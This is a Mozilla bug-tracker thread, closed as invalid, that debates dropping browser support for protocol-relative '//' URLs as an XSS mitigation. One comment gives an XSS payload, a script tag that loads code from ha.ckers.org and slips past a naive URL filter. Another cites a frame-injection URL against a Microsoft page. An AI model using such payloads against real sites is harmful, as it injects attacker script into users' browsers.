Closed Bug 362259 Opened 18 years ago Closed 12 years ago

Drop support for links beginning with "//" (protocol-relative links)

Categories

(Core :: Networking, enhancement)

Product:
Core
Component:
Networking
Type:
enhancement
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: BijuMailList, Unassigned)

References

Details

Attachments

(2 files)

no_protocol_xss.html
968 bytes, text/html
Details
no_protocol_s_xss.html
968 bytes, text/html
Details 
XSS: on no protocol we should not defaults to current page's protocol 
credits to http://ha.ckers.org/xss.html

At present on no protocol we defaults to current page's protocol.

only place I find a need for this is if the current page is in local/network disk  
ie, current page accessed by file://


do we need to continue supporting this?
(even though it may be a standard)

IMHO to reduce XSS we should drop this support expect for file:// protocol 

see attachment no_protocol_xss.html

This is applicable to links, images, frames, scripts, style etc.



blocks: bug 301375
Attached file no_protocol_xss.html 

    
    

    
  
why is this a problem?
OS: Windows XP → All
Hardware: PC → All

    
    

    
  
Removing this support unconditionally will break some sites, mostly for http.

    
    

    
  
(In reply to comment #2)
> why is this a problem?

answer:- insufficient sanitizing.

case 1.
say a site will allows images on their site be embedded into user submitted content.
now somebody comes and add a x-rate image from another site.

test was done on pattermatching /^(ht|f)tps?:\/\// to identify external image 


case 2.
say a social networking site allow their own javascript widjets to be embeded to the page.

following will pass the test, but this own is accessing http://ha.ckers.org/
<SCRIPT SRC=//ha.ckers.org/.j>

(In reply to comment #3)
> Removing this support unconditionally will break some sites, mostly for http.
I want to see few examples...



    
    

    
  

      
      
      
      

        Attached file
          
        no_protocol_s_xss.html
      

    


  
missed bugzilla is https

    
    

    
  
What does this have to do with XSS?
Summary: XSS: on no protocol we should not defaults to current page's protocol → Drop support for links beginning with "//" (protocol-relative links)

    
    

    
  
(In reply to comment #6)
> What does this have to do with XSS?

This is listed as one of the way to do XSS at http://ha.ckers.org/


    
    

    
  
This would break Slashdot among other sites. Examples cited by comment #4 are the responsibilities of the sites allowing user-submitted content, not the browser.

    
    

    
  
(In reply to comment #8)
> This would break Slashdot among other sites.
verified Slashdot, yes it use //  fixing this will break Slashdot,

Is there any other sites do the same.

> the responsibilities of the sites allowing user-submitted content, not the
> browser.
NB: I totally agree... 



    
    

    
  
Here is an example for frame injection using URL starting with //: http://msdn.microsoft.com/library/default.asp?url=//www.google.com/. This was disclosed on sla.ckers.org on February 10, but for some reason Microsoft chose not to fix it.

However, I only now realized that the reason this was only working in Firefox is not that Firefox is the only browser supporting URLs starting with // - it is not. However, only Firefox ignores <script language="JScript"> that redirects you to a 404 page. In Internet Explorer with Active Scripting disabled this attack works as well.

So I would say this bug is a WONTFIX. http://ha.ckers.org/xss.html#XSS_Protocol_resolution has a point however - we should not accept script tags without closing </script>, no other browser does. I will file a bug on this.

    
    

    
  
> we should not accept script tags without closing </script>, no
> other browser does.  I will file a bug on this.

This was bug 376899, which turned out to be a dup of bug 305873.

    
    

    
  
http://www.nedbatchelder.com/blog/200710.html#e20071017T215538 describes one reason to use this kind of URL.

    
    

    
  
This should probably be closed WONTFIX.  Protocol relative URLs are becoming fairly commonplace among sites that need assets loaded on both http and https pages and do not want a mixed content warning.

The XSS issues mentioned are due to improper input sanitization.  This is a server side developer problem, not a browser problem.  Developers need to sanitize their inputs or Little Bobby Tables will get them.

    
  
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → WONTFIX

    
    

    
  
WONTFIX -> INVALID. Now most (all?) relevant specifications require support for protocol-relative URI references.
Resolution: WONTFIX → INVALID

    
    

    
  
> This is how browsers deal with URLs (unfortunately): http://url.spec.whatwg.org/

We could warn about and eventually deprecate protocol-relative links, like we did with the (even more confusing) case of links that start with "username:password@".

I don't think it's worth the breakage and warning fatigue, though.

    
    

    
  
Given the common use case outlined in comment 13 - no, I don't think a warning would be justified.

          You need to log in
          before you can comment on or make changes to this bug.
        






  

    
  







  

    

      
Attachment

      

      
      
      
      
    

    

      

        

          

            
General

            

              Creator: 



            

            
Created: 

            
Updated: 

            
Size: